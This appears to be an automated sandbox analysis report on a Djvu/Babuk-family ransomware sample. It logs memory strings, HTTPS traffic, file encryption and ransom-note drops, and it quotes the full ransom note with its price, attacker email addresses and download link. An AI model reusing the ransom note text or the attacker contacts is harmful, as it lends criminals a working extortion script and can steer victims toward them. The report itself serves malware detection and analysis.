Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000008.00000003.1990031442.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: build2.exe, 00000008.00000003.1990031442.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: build2.exe, 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: build2.exe, 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfail
Source: build2.exe, 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfailAt
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000706000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000912000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.000000000093A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.106.57.101:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49756 version: TLS 1.2

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

1_2_004822E0

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_README.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0864PsawqSitkm7MOsOlVQkbEQhWCVEWoMyGFhVjgEdpNlgfiz

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 6696, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 11.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mJVVW85CnW.exe.5e315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1863815336.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2097220953.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 6932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mJVVW85CnW.exe PID: 6696, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.mp3	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File deleted: C:\Users\user\Desktop\NWTVCDUMOB.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File moved: C:\Users\user\Desktop\DVWHKMNFNN\IPKGELNTQY.mp3
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File deleted: C:\Users\user\Desktop\DVWHKMNFNN\IPKGELNTQY.mp3
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.pdf

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;h	Jump to dropped file
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99380679236	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.99307728437	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99356707009	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99275004903	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99717827276	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99632009307	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99847235541	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm entropy: 7.99141791969	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133583894764791234.txt entropy: 7.99854244798	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945572911884.txt entropy: 7.99825633963	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99571092165	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99824987516	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99833528398	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99844786079	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.9960671863	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.9983467631	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99864239435	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99834147621	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99727477755	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99869630894	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.994010337	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99852947845	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99728121172	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99872475209	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wct150C.tmp.bgzq (copy) entropy: 7.99741805931	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.bgzq (copy) entropy: 7.99747700959	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.bgzq (copy) entropy: 7.99741614818	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wct443C.tmp.bgzq (copy) entropy: 7.9965155312	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.bgzq (copy) entropy: 7.99723687468	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.bgzq (copy) entropy: 7.99783844139	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.bgzq (copy) entropy: 7.9974696927	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.bgzq (copy) entropy: 7.99782408022	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.bgzq (copy) entropy: 7.99755408802	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\wctF411.tmp.bgzq (copy) entropy: 7.99749263279	Jump to dropped file
